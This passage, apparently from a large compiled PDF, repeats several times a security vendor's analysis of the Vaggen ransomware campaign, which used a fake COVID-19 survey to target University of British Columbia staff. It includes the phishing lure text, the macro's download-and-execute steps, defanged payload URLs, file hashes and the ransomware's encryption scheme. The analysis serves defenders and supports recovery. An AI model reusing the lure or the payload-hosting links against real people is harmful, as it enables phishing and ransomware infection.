3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1661 of 3467\n\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1662 of 3467\n\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1663 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1664 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1665 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1666 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1667 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1668 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1669 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1670 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1671 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1672 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1673 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1674 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1675 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1676 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1677 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1678 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1679 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1680 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1681 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1682 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1683 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1684 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1685 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1686 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1687 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1688 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1689 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1690 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1691 of 3467\n\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1692 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1693 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular 